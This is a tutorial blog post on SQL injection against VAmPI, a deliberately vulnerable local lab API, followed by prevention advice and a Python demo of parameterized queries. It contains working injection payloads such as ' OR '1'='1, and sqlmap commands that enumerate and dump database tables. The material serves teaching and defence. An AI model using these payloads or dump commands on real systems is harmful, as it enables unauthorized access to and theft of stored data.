Stratos Ally

SQL Injection in VAmPI Part-5 

**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.** 

The most basic way to describe a database is as a table (or tables) of data. Data in these tables is stored in a defined structure, using indexes so that queries can be answered efficiently.  

SQL is utilized for interacting with databases.  

How does SQL injection work?  

Suppose an application allows users of a public web page to check their marketing preferences by entering their email addresses.  

When a user searches for their preferences, their email address is inserted directly into the query; for example, if their email were test@email.com, the SQL query would look like this:  

SELECT * FROM user_preferences WHERE email = 'test@email.com';  

By injecting additional SQL code into the statement that retrieves the data, an attacker can make the query return every row in the table (every email address registered on this web page) rather than just the details for one email.  

SELECT * FROM user_preferences WHERE email = 'test@email.com' OR '1'='1';  

Because the input is not sanitized, additional SQL can be passed into the query above by closing off the string literal with a single apostrophe (') and appending your own SQL. Using Boolean logic, you want the WHERE clause to evaluate to true for every row, which makes the database return all rows instead of just one. The classic example is OR 1=1 (since 1=1 is always true, every row is returned).  

Original user input: test@email.com  

Malicious user input: test@email.com' OR '1'='1  

Before the walkthrough, install VAmPI and Postman if you have not already done so, by following the links below: 

1. Understanding and Installing VAmPI – A Vulnerable REST API (Part 1) – Stratos Ally 

2. Installing Postman: An API testing tool – Stratos Ally 

Walkthrough of target API endpoint (manual): /users/v1/:username  

  1. Retrieve a user by username: /users/v1/ashish 
  2. Break the API endpoint: /users/v1/ashish' 

We broke the developer's code and saw an error message, which shows that SQL injection might be possible here. 

  3. Write the payload in the API endpoint: /users/v1/' OR '1'='1 

Output: 

    "username": "name1", 
    "email": "mail1@mail.com" 

We were able to exploit the API endpoint successfully and retrieved the very first entry in the table using SQL injection.  

SQLMap 

SQLMap is a very popular open-source tool used for automating the exploitation of SQL injection. It’s widely recognized for its efficiency and ease of use in compromising database servers. 

Key Features of SQLMap 

  1. Automation: Streamlines the process of finding and exploiting SQL injection flaws. 
  2. Database Compatibility: Supports a wide range of DBMSs such as MySQL, PostgreSQL, Oracle, etc. 
  3. DBMS Fingerprinting: Accurately determines the type of DBMS in use. 
  4. Data Extraction: Retrieves database names, tables, columns, and data. 
  5. Operating System Interaction: Executes commands at the operating-system level via out-of-band connections. 
  6. Database Access: Provides options to connect to the database using credentials found during testing. 

To learn more about SQLMap, write the command: sqlmap -h 

These options can be used to enumerate the back-end database management system, its structure, and the data contained in its tables. 

Walkthrough of target API endpoint (using SQLMap):  /users/v1/:username 

  1. Write the SQLMap command: sqlmap -u http://127.0.0.1:5000/users/v1/ashish 

-u: denotes the URL/API endpoint we want to target 

SQLMap reported that the back-end DBMS is SQLite. 

  2. After identifying the DBMS, let's enumerate the tables in SQLite.  

Write the command: sqlmap -u http://127.0.0.1:5000/users/v1/ashish --dbms=SQLite --tables 

SQLMap found two tables: books and users. 

  3. Now, we enumerate the columns of both tables and dump their contents. 

sqlmap -u http://127.0.0.1:5000/users/v1/ashish --dbms=SQLite -T books,users --dump 

--dump: retrieves the contents of the specified tables. 

Prevention 

To mitigate the risk of SQL injection attacks, it’s essential to use a combination of manual and automated techniques.  

  1. Implementing parameterized queries, stored procedures, and rigorous input validation are key steps.  
  2. Regularly updating systems, monitoring for suspicious activities, and adhering to secure coding practices further enhance your defence. 

By following these measures, you can ensure that your applications properly handle user inputs, safeguarding the integrity and security of your databases. The objective is to proactively secure your systems against potential SQL injection vulnerabilities, thereby maintaining robust security and protecting sensitive data. 
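The following example ties together the injection explained earlier (the user_preferences lookup by email address) and the parameterized-query and input-validation advice above. It is an added example written for this article, not code from Stratos Ally or from the VAmPI project: the newsletter column, the sample rows and the e-mail pattern are constructed for the demonstration, and an in-memory SQLite database stands in for the real back end. The vulnerable function reproduces the string-concatenation pattern from the article so that the malicious input returns every row; the hardened functions bind the value as a parameter and, as a second layer, reject input that does not look like an e-mail address.

```python
import re
import sqlite3

# Constructed sample data standing in for the article's user_preferences table.
SAMPLE_ROWS = [
    ("test@email.com", "weekly"),
    ("alice@example.org", "none"),
    ("bob@example.org", "daily"),
]


def make_db():
    """Create an in-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_preferences (email TEXT, newsletter TEXT)")
    conn.executemany("INSERT INTO user_preferences VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, email):
    """Build the query by string concatenation, the pattern the article
    describes. An apostrophe in the input closes the string literal and the
    rest of the input is executed as SQL."""
    query = (
        "SELECT email, newsletter FROM user_preferences WHERE email = '"
        + email
        + "'"
    )
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, email):
    """Send the SQL text and the value separately. The driver binds the value
    as data, so an apostrophe can never terminate the literal."""
    query = "SELECT email, newsletter FROM user_preferences WHERE email = ?"
    return conn.execute(query, (email,)).fetchall()


# Simple shape check for an e-mail address (constructed for this example).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def lookup_validated(conn, email):
    """Defence in depth: reject input that is not shaped like an e-mail
    address before it reaches the database, then still bind the parameter."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected input: not a valid e-mail address")
    return lookup_parameterized(conn, email)


def demo():
    """Run the benign and malicious inputs through each variant."""
    conn = make_db()
    benign = "test@email.com"
    malicious = "test@email.com' OR '1'='1"  # the payload from the article
    results = {
        "vulnerable_benign": lookup_vulnerable(conn, benign),
        "vulnerable_malicious": lookup_vulnerable(conn, malicious),
        "parameterized_malicious": lookup_parameterized(conn, malicious),
    }
    try:
        lookup_validated(conn, malicious)
        results["validated_malicious"] = "accepted"
    except ValueError:
        results["validated_malicious"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the script shows the three outcomes side by side: the concatenated query returns one row for the benign address but all three rows for the malicious one, the parameterized query returns nothing for the malicious input because the whole string is compared as a literal e-mail address, and the validated lookup rejects it before any query is sent. Validation alone would not be enough (a legitimate-looking value can still contain SQL metacharacters in other schemas), which is why the bound parameter remains the primary control.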
